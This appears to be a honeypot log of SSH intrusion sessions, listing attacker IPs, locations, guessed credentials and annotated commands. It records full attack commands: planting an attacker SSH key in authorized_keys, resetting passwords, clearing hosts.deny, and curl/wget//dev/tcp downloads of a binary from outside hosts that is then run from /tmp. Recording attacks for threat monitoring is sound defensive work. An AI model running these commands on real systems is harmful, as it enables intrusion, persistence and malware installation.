$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 k-pop_root_26 (112.217.199.222) β€” Seocho-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-05 14:21 EDT Β· as postgres/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nMamt2ecP2E6l\nMamt2ecP2E6l"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nMamt2ecP2E6l\nMamt2ecP2E6l\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_36 (8.166.113.178) β€” Guangzhou, China Β· 1 session Β· 3 cmds
2026-05-05 13:59 EDT Β· as root/12345678
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://180.119.170.225:8674/linux -o /tmp/mAESctJKvH; if [ ! -f /tmp/mAESctJKvH ]; then wget http://180.119.170.225:8674/linux -O /tmp/mAESctJKvH; fi; if [ ! -f /tmp/mAESctJKvH ]; then exec 6<>/dev/tcp/180.119.170.225/8674 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/mAESctJKvH ; chmod +x /tmp/mAESctJKvH && /tmp/mAESctJKvH WVoBga4ZTGJ3n0/DzDLRyEieamdUBqiHHksqIVQChqkZQ2RjlE7G0CDTw0aDaGZMGauABFQsKUAHgKwPVGBhnVDD0znMw0mdd2NGAqCMBk0sOEsBhrQFQ39rnknc1zHYy0eeYXFFBaOaAkosNk4eha8FTmhvn0bS1DDMwE6Yd2NGD7SFBkAhLUIClKsGQH9rn0bc0zPb3EiZY2dDBaKUCFQqKU0ehqwZQmNjmk/H1CDRy1CUYX9FBqiaAkoqIkIDga8XTH9omUbc1DnMw0yUY2dEBK6UCFQpLU4ehqoZRWlul0nE2jbCxkmDaGNFGauMBFQpK0IKjaIFR3FvnFDD1THMxEaDaGFDDayDAkI4IFQBgKIZQmV3n0rB2DnbykiNYX9FAayaAUsrNksHjKAOTWBqjU/K0i7VxFCcamZaBK2OBkopK08QhqoFWmNog0/A0y7Qw0iXYWlEA7qMHksrIFQCh68ZRWZgl0bA1TjCw0yed2BGDrSGAkk2L08KjaoDRnFonEbc0zfa3E+ZbX9ABqCDBEwgOE4JmqgEQX9vnFDG1zrUwUydeWBFALSBCVQpKk8ehawBTmdtm0rS2i7TxkaDb2VaBa6HCkMhIEwQgK0ZRmJgg0/L0y7TxUmXb2NDB7qFAUI2KUMFmqgDR39omEjI1DTTwl6Zbn9GA6iaBUI2IE4KgqoGRGh5nEvGzDjR3EycaH9GBKCCA0kuOEsBjbQGTWh3nkvc0DDRyEidaGFBF6KFHkwgNkgCgbQGRGFjm0zA0907zknWZq7IMMcK17mFWyV0ammZ2lFM/f5BxXtg; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/mAESctJKvH && /tmp/mAESctJKvH WVoBga4ZTGJ3n0/DzDLRyEieamdUBqiHHksqIVQChqkZQ2RjlE7G0CDTw0aDaGZMGauABFQsKUAHgKwPVGBhnVDD0znMw0mdd2NGAqCMBk0sOEsBhrQFQ39rnknc1zHYy0eeYXFFBaOaAkosNk4eha8FTmhvn0bS1DDMwE6Yd2NGD7SFBkAhLUIClKsGQH9rn0bc0zPb3EiZY2dDBaKUCFQqKU0ehqwZQmNjmk/H1CDRy1CUYX9FBqiaAkoqIkIDga8XTH9omUbc1DnMw0yUY2dEBK6UCFQpLU4ehqoZRWlul0nE2jbCxkmDaGNFGauMBFQpK0IKjaIFR3FvnFDD1THMxEaDaGFDDayDAkI4IFQBgKIZQmV3n0rB2DnbykiNYX9FAayaAUsrNksHjKAOTWBqjU/K0i7VxFCcamZaBK2OBkopK08QhqoFWmNog0/A0y7Qw0iXYWlEA7qMHksrIFQCh68ZRWZgl0bA1TjCw0yed2BGDrSGAkk2L08KjaoDRnFonEbc0zfa3E+ZbX9ABqCDBEwgOE4JmqgEQX9vnFDG1zrUwUydeWBFALSBCVQpKk8ehawBTmdtm0rS2i7TxkaDb2VaBa6HCkMhIEwQgK0ZRmJgg0/L0y7TxUmXb2NDB7qFAUI2KUMFmqgDR39omEjI1DTTwl6Zbn9GA6iaBUI2IE4KgqoGRGh5nEvGzDjR3EycaH9GBKCCA0kuOEsBjbQGTWh3nkvc0DDRyEidaGFBF6KFHkwgNkgCgbQGRGFjm0zA0907zknWZq7IMMcK17mFWyV0ammZ2lFM/f5BxXtg" & // payload download from C2
$ head -c 3716336 > /tmp/xaHEuPs7Gu // execute from /tmp
🎭 cipher_root_23 (89.47.53.19) β€” SfΓ’ntu Gheorghe, Romania Β· 1 session Β· 20 cmds
2026-05-05 10:06 EDT Β· as testuser/q1w2e3r4
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "q1w2e3r4\njqETZKiJmGkf\njqETZKiJmGkf"|passwd|bash
$ Enter new UNIX password:
$ echo "q1w2e3r4\njqETZKiJmGkf\njqETZKiJmGkf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_117 (110.39.9.140) β€” Lahore, Pakistan Β· 1 session Β· 19 cmds
2026-05-05 09:22 EDT Β· as root/cloud2024
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:fAbIVkaelgIh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_44 (8.135.238.47) β€” Shenzhen, China Β· 1 session Β· 3 cmds
2026-05-05 09:15 EDT Β· as root/password
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://139.59.8.21:60105/linux -o /tmp/bBhyNf8Hbk; if [ ! -f /tmp/bBhyNf8Hbk ]; then wget http://139.59.8.21:60105/linux -O /tmp/bBhyNf8Hbk; fi; if [ ! -f /tmp/bBhyNf8Hbk ]; then exec 6<>/dev/tcp/139.59.8.21/60105 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/bBhyNf8Hbk ; chmod +x /tmp/bBhyNf8Hbk && /tmp/bBhyNf8Hbk LKuxF4RLCNPKNvDvP9LRCV2FF6C6XFmlshGHSwHd0SHs7DXd2QBQkhawpV9dvq4Shl0e3NQ16O061ssEUpwStLlDXLu4DoVUCt3UPu7pL9XbBkuDEq66W1ylsRaLXwfd3D3+7D3XxQFViw6yuV1DurcQiF0G0tcv6ukh1t8CS4cYrrNZV72wEYJcENrVPfDvPdDFA1acGLexW126tBeSVwLbyj7m7iHd0h5Sgxq2u1xdvqARgVwe3t0h5vA91dEGVYMQtatcXL+uFYdLAdzUIezmNdzeAFWSEbGzQ1yytQ6DXAHF1j3r5DbT0wRFgRauultepbQSnFYE0dI/7+46xNMeVIEVrrleVaW0F4hSCdzQL+/rPsrZBFecEbG9Q1y+uBqEVQHb0S/q6SHc3R5WgQ6xslhXvbARgVUQ2tU98Os+ytoFS4MVsbFbXbqwFZJRAcXSP/DsOtXFAV2LGre/X1ursRKDSwbZyj7q6SHV3QJfhBCxu1hNurITnFQC0so97O0h094KXIIUsqtVQ7mxF5xWAsXVOOvkONXZAkWDErGlX1WlsReCSwbd3jfo7T3E2gJUnBOwpV9duK4Shl0K3dQ+7usv3MUCVIoOsbldQ7q3GIhSB97VL+/sP8raCVOcEbW4Q1y5uhaCVADexD7t5yHR0h5dnBKxsVtdurAVklQC2Mo+7Och1tgAS4ESurJbVLygEYVTHtPcIefwPtTdClyKF7erWVqlshSASwXTyjfq5DnU2gBckhG5u0NUua4UiksF3N457u8/0QD46LUEOQZmPNtPkdTYjTZctpVoc201Iw==; fi; echo password > /tmp/.opass; chmod +x /tmp/bBhyNf8Hbk && /tmp/bBhyNf8Hbk LKuxF4RLCNPKNvDvP9LRCV2FF6C6XFmlshGHSwHd0SHs7DXd2QBQkhawpV9dvq4Shl0e3NQ16O061ssEUpwStLlDXLu4DoVUCt3UPu7pL9XbBkuDEq66W1ylsRaLXwfd3D3+7D3XxQFViw6yuV1DurcQiF0G0tcv6ukh1t8CS4cYrrNZV72wEYJcENrVPfDvPdDFA1acGLexW126tBeSVwLbyj7m7iHd0h5Sgxq2u1xdvqARgVwe3t0h5vA91dEGVYMQtatcXL+uFYdLAdzUIezmNdzeAFWSEbGzQ1yytQ6DXAHF1j3r5DbT0wRFgRauultepbQSnFYE0dI/7+46xNMeVIEVrrleVaW0F4hSCdzQL+/rPsrZBFecEbG9Q1y+uBqEVQHb0S/q6SHc3R5WgQ6xslhXvbARgVUQ2tU98Os+ytoFS4MVsbFbXbqwFZJRAcXSP/DsOtXFAV2LGre/X1ursRKDSwbZyj7q6SHV3QJfhBCxu1hNurITnFQC0so97O0h094KXIIUsqtVQ7mxF5xWAsXVOOvkONXZAkWDErGlX1WlsReCSwbd3jfo7T3E2gJUnBOwpV9duK4Shl0K3dQ+7usv3MUCVIoOsbldQ7q3GIhSB97VL+/sP8raCVOcEbW4Q1y5uhaCVADexD7t5yHR0h5dnBKxsVtdurAVklQC2Mo+7Och1tgAS4ESurJbVLygEYVTHtPcIefwPtTdClyKF7erWVqlshSASwXTyjfq5DnU2gBckhG5u0NUua4UiksF3N457u8/0QD46LUEOQZmPNtPkdTYjTZctpVoc201Iw==" & // payload download from C2
$ head -c 3716336 > /tmp/lh67gJyJ8g // execute from /tmp
🎭 specter_root_114 (186.123.101.50) β€” Avellaneda, Argentina Β· 1 session Β· 20 cmds
2026-05-05 06:54 EDT Β· as testftp/111111
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "111111\nta1oqyzROSc3\nta1oqyzROSc3"|passwd|bash
$ Enter new UNIX password:
$ echo "111111\nta1oqyzROSc3\nta1oqyzROSc3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_root_22 (161.35.205.74) β€” Frankfurt am Main, Germany Β· 1 session Β· 20 cmds
2026-05-05 06:30 EDT Β· as ali/asdf1234
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "asdf1234\nJN4xgkFez8d5\nJN4xgkFez8d5"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf1234\nJN4xgkFez8d5\nJN4xgkFez8d5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chateau_root_18 (129.151.225.209) β€” Marseille, France Β· 1 session Β· 9 cmds
2026-05-05 04:51 EDT Β· as root/12345
echo β†’ payload download from C2 β†’ execute from /tmp
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 yankee_root_48 (216.180.127.201) β€” Dallas, United States Β· 1 session Β· 19 cmds
2026-05-05 04:24 EDT Β· as root/1qaz
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:G8ITZvNJpKe9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root_13 (45.153.34.205) β€” Eygelshoven, Netherlands Β· 1 session Β· 1 cmd
2026-05-05 04:04 EDT Β· as root/password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a ; echo 'vT'
🎭 specter_root_3 (212.115.54.84) β€” Taoyuan District, Taiwan Β· 1 session Β· 19 cmds
2026-05-05 03:35 EDT Β· as root/Wp123456.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:WGdF9F050kzU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_70 (34.135.200.178) β€” Council Bluffs, United States Β· 1 session Β· 19 cmds
2026-05-05 03:25 EDT Β· as root/!@#qwe123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cM1YHVkfj2N9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_129 (197.199.224.52) β€” Al Qāhirah al JadΔ«dah, Egypt Β· 1 session Β· 20 cmds
2026-05-05 03:25 EDT Β· as testuser/changeme
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "changeme\nugU9k3cSlnE3\nugU9k3cSlnE3"|passwd|bash
$ Enter new UNIX password:
$ echo "changeme\nugU9k3cSlnE3\nugU9k3cSlnE3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_15 (176.124.88.29) β€” Astana, Kazakhstan Β· 1 session Β· 19 cmds
2026-05-05 03:20 EDT Β· as root/!@#qwe123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Z2HX0Crne0R8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_111 (124.109.2.211) β€” Bangkok Yai, Thailand Β· 1 session Β· 19 cmds
2026-05-05 01:30 EDT Β· as root/admin-123456
